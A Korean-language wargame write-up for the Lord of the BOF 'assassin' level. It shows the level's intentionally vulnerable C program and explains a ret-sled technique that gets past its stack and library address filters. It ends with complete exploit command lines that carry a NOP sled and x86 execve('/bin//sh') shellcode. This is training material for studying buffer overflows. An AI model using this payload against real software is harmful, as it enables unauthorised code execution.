[LOB] giant -> assassin

/*
        The Lord of the BOF : The Fellowship of the BOF
        - assassin
        - no stack, no RTL
*/
 
#include <stdio.h>
#include <stdlib.h>
 
main(int argc, char *argv[])
{
    char buffer[40];
 
    if(argc < 2){
        printf("argv error\n");
        exit(0);
    }
 
    if(argv[1][47] == '\xbf')
    {
        printf("stack retbayed you!\n");
        exit(0);
    }
 
        if(argv[1][47] == '\x40')
        {
                printf("library retbayed you, too!!\n");
                exit(0);
        }
 
    strcpy(buffer, argv[1]); 
    printf("%s\n", buffer);
 
        // buffer+sfp hunter
        memset(buffer, 0, 44);
}
 

시작

스택이 배신하였고....  라이브러리마저 배신하였다. 게다가 buffer~sfp까지 프로그램이 종료되기전에 0으로 초기화된다.

즉 SFP조작 불가, 스택, 라이브러리 점프 불가이다.

그럼 어디로 점프할 수 있을까? 하고 보니... main영역안의 ret 명령 주소로로 점프하면 좋을듯하다.

ret의 동작은 pop eip, jmp eip 이므로... esp값을 4증가 시키고 pop한 주소로 이동하게 된다.

그러므로 여기서 main의 return_addr에 ret의 주소를 넣으면 esp를 한칸 위로 올리고 또 ret명령을 만나 eip를 pop해 그 주소로 점프하게 된다.

즉 main의 return_Addr+4의 위치로 점프하게 되므로... 여기에 있는 스택,라이브러리주소 점프 필터를 거를 수 있다.

이렇게 ret를 타고 이동한다해서 ret sled기법이라 불린다. 바로 시도해보자.

ret의 주소는 0x804851e 이다.

buffer와 sfp는 0으로 초기화되므로 그 쪽은 쓸 수 없고, argv[1]영역을 이용해도 좋긴하나, NOP이 많으면 편하므로 argv[2]를 활용하자

인자1 : buffer(44byte) + ret주소(4) + shellcode주소(4) 

인자2 : 쉘코드

./assassin `python -c 'print("A"*44+"\x1e\x85\x04\x08"+"\xbf\xbf\xbf\xbf")'` `python -c 'print("\x90"*1000+"\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x53\x89\xe1\x89\xc2\xb0\x0b\xcd\x80")'

적당히 주소를 잡아 쉘코드주소로 쓰자

payload : ./assassin `python -c 'print("A"*44+"\x1e\x85\x04\x08"+"\x14\xf9\xff\xbf")'` `python -c 'print("\x90"*1000+"\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x53\x89\xe1\x89\xc2\xb0\x0b\xcd\x80")'`

클리어